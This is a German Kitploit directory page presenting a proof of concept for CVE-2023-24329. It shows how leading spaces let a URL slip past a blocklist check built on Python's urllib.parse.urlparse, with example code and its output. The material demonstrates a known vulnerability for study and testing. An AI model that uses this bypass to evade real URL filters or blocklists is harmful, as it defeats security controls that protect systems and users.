Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-24329-Exploit — Proof-of-concept, der einen URL-Parsing-Bypass in Pythons `urllib.parse` (CVE-2023-24329) demonstriert, der das Umgehen von Blocklisten durch Voranstellen von Leerzeichen ermöglicht. | Kitploit
Tools/GitHubGitHub/pentestmano/cve-2023-24329-exploit
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubpentestmano/cve-2023-24329-exploit

CVE-2023-24329-Exploit

Proof-of-concept, der einen URL-Parsing-Bypass in Pythons `urllib.parse` (CVE-2023-24329) demonstriert, der das Umgehen von Blocklisten durch Voranstellen von Leerzeichen ermöglicht.

Repository anzeigen
vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Einführung

Die URL-Parsing-Funktionen konzentrieren sich darauf, eine URL-Zeichenfolge in ihre Komponenten zu zerlegen oder URL-Komponenten zu einer URL-Zeichenfolge zusammenzusetzen.

  • urllib.parse.urlparse

Einfach urllib.parse wird zum Parsen von URLs verwendet, wir können es umgehen, indem wir Leerzeichen vor der URL hinzufügen. Dies passiert in Python 3.11.4 und früher.

PoC

Lassen Sie uns example.py aufschlüsseln

Hier ist eine Reihe von Websites, auf die Sie nicht zugreifen sollten:

root@kitploit:~
blocked_list = [
    "http://example.com/",
    "http://example2.com/"
]

Diese Funktion prüft, ob eine Website auf der Blockliste steht oder nicht. Wenn sie auf der Blockliste steht, sollte sie URL Blocked zurückgeben.

root@kitploit:~
def is_url_blocked(url):
    parse = urllib.parse.urlparse(url).geturl()
    if  parse in blocked_list: return 'URL Blocked'
    else: return 'Bypassed'

Jetzt habe ich zwei URLs hinzugefügt und prüfe, ob eine von ihnen blockiert ist und nicht aufgerufen werden kann:

root@kitploit:~
payload1 = "    http://example.com/"
payload2 = "http://example.com/"

print(
    is_url_blocked(payload1),
    "\n",
    is_url_blocked(payload2)
)

payload1 ist der Fall, in dem ich is_url_blocked() umgangen habe, denn das Hinzufügen eines langen Leerzeichens vor der URL umgeht urllib.parse.urlparse(url).geturl() – es wird nicht wie erwartet ausgeführt. Deshalb ist die Ausgabe

root@kitploit:~
Bypassed

Aber bei payload2 erhalten wir

root@kitploit:~
URL Blocked

Unterstützung

Wenn Sie mich mit einer Spende unterstützen möchten, empfehle ich Ihnen, sie bitte jemandem zu geben, der sie wirklich braucht. Wenn Sie das tun, betrachten Sie es als meine Unterstützung, die Sie verdient haben.

Buy Me A Coffee

Tool herunterladen